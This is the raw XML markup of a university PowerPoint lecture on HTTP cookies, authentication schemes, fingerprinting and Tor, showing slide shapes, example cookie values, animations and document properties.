                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A77580C-FB4C-421D-A670-33B9ACB5EFF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="765" y="1915"/>
                <a:ext cx="83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a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>amazon: 1678</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>ebay: 8734</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58FA566-5702-4EB7-BD23-F192F3F40E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1811339" y="2033588"/>
            <a:ext cx="1787525" cy="938212"/>
            <a:chOff x="181" y="1281"/>
            <a:chExt cx="1126" cy="591"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27676" name="AutoShape 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477ECF45-1DDF-476E-8764-D45B0EC91583}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="181" y="1296"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27677" name="Group 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71187AF-5C64-4255-8B49-80DC64AC8F05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="292" y="1281"/>
              <a:ext cx="765" cy="588"/>
              <a:chOff x="765" y="1693"/>
              <a:chExt cx="765" cy="588"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27678" name="Text Box 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DACFAE5-301B-4F59-A47D-D02AE897B064}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="980" y="1693"/>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b="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Cookies</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27679" name="Text Box 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C345A46D-6CEB-47D6-9B60-87196DC904AD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="765" y="1915"/>
                <a:ext cx="682"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endParaRPr lang="en-US" altLang="it-IT" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>ebay: 8734</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78CB141-E955-4D6B-B86E-F9F9BBE7C34E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1785939" y="4989513"/>
            <a:ext cx="1787525" cy="933450"/>
            <a:chOff x="654" y="1693"/>
            <a:chExt cx="1126" cy="588"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27672" name="AutoShape 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B115A9-A01A-4B88-84C0-C085B5B5B14F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="654" y="1700"/>
              <a:ext cx="1126" cy="576"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48872"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ct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lgn="ctr">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27673" name="Group 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0743E96-18C7-4D01-9B2D-E69ECEBF89D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="765" y="1693"/>
              <a:ext cx="839" cy="588"/>
              <a:chOff x="765" y="1693"/>
              <a:chExt cx="839" cy="588"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27674" name="Text Box 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E43676A-AF26-4644-8AFD-9C2BBABF0A97}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="980" y="1693"/>
                <a:ext cx="55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b="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Cookies</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27675" name="Text Box 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D38418F-5261-4944-A885-6967F9976BB5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="765" y="1915"/>
                <a:ext cx="83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a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>amazon: 1678</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="it-IT" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>ebay: 8734</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27671" name="Text Box 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE9704C3-2891-427D-87FE-E7B813047461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1724026" y="4484689"/>
            <a:ext cx="17494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70000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>one week later: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4"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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="5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8919"/>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8942"/>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892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38940"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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941"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="68" fill="hold" nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="69" fill="hold" nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="70" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="71"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animBg="1"/>
      <p:bldP spid="38922" grpId="0" animBg="1"/>
      <p:bldP spid="38940" grpId="0"/>
      <p:bldP spid="38941" grpId="0"/>
      <p:bldP spid="3894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erra">
  <a:themeElements>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erra">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erra">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Terra">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themeOverride>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Trek</Template>
  <TotalTime>0</TotalTime>
  <Words>5709</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>543</Paragraphs>
  <Slides>56</Slides>
  <Notes>54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56</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="68" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>ZapfDingbats</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Terra</vt:lpstr>
      <vt:lpstr>Cookies &amp; Friends</vt:lpstr>
      <vt:lpstr>The HTTP message format</vt:lpstr>
      <vt:lpstr>General format</vt:lpstr>
      <vt:lpstr>Data transmission clientserver</vt:lpstr>
      <vt:lpstr>HTTP Commands</vt:lpstr>
      <vt:lpstr>Response Message</vt:lpstr>
      <vt:lpstr>Error codes</vt:lpstr>
      <vt:lpstr>User-server state: cookies</vt:lpstr>
      <vt:lpstr>Cookies: keeping “state”</vt:lpstr>
      <vt:lpstr>Cookies (continued)</vt:lpstr>
      <vt:lpstr>Uses: Session management</vt:lpstr>
      <vt:lpstr>  Uses: Personalization </vt:lpstr>
      <vt:lpstr>   Uses: Tracking  </vt:lpstr>
      <vt:lpstr> Third-party cookies </vt:lpstr>
      <vt:lpstr>Implementation(1)</vt:lpstr>
      <vt:lpstr>Implementation(2)</vt:lpstr>
      <vt:lpstr> Setting a cookie (1) </vt:lpstr>
      <vt:lpstr> Setting a cookie (2) </vt:lpstr>
      <vt:lpstr> Cookie attributes (1) </vt:lpstr>
      <vt:lpstr> Cookie attributes (2) </vt:lpstr>
      <vt:lpstr> Expiration </vt:lpstr>
      <vt:lpstr>Misconceptions about Cookies..</vt:lpstr>
      <vt:lpstr> Browser settings </vt:lpstr>
      <vt:lpstr> Privacy and third-party cookies </vt:lpstr>
      <vt:lpstr> Drawbacks (1) </vt:lpstr>
      <vt:lpstr> Drawbacks (2) </vt:lpstr>
      <vt:lpstr> Drawbacks (3) </vt:lpstr>
      <vt:lpstr> Draw0ììacks (4) </vt:lpstr>
      <vt:lpstr> Drawbacks (5) </vt:lpstr>
      <vt:lpstr> Drawbacks (6) </vt:lpstr>
      <vt:lpstr>Alternatives to cookies</vt:lpstr>
      <vt:lpstr>Alternatives to cookies</vt:lpstr>
      <vt:lpstr>Alternatives to cookies</vt:lpstr>
      <vt:lpstr>Alternatives to cookies</vt:lpstr>
      <vt:lpstr>Alternatives to cookies</vt:lpstr>
      <vt:lpstr>Alternatives to cookies</vt:lpstr>
      <vt:lpstr> Basic access authentication </vt:lpstr>
      <vt:lpstr> Basic access authentication </vt:lpstr>
      <vt:lpstr>  Advantages  </vt:lpstr>
      <vt:lpstr>Disadvantages</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr> Digest access authentication </vt:lpstr>
      <vt:lpstr>RFC 2069</vt:lpstr>
      <vt:lpstr>RFC 2617</vt:lpstr>
      <vt:lpstr>MD5 &amp; Digest authentication</vt:lpstr>
      <vt:lpstr>  Advantages </vt:lpstr>
      <vt:lpstr>Disadvantages</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>User Fingerprinting</vt:lpstr>
      <vt:lpstr>The TOR NETWORK</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>universita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alessandra;giogio</dc:creator>
  <cp:lastModifiedBy>Giovambattista Ianni</cp:lastModifiedBy>
  <cp:revision>164</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-05-01T14:20:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-20T10:15:10Z</dcterms:modified>
</cp:coreProperties>
</file>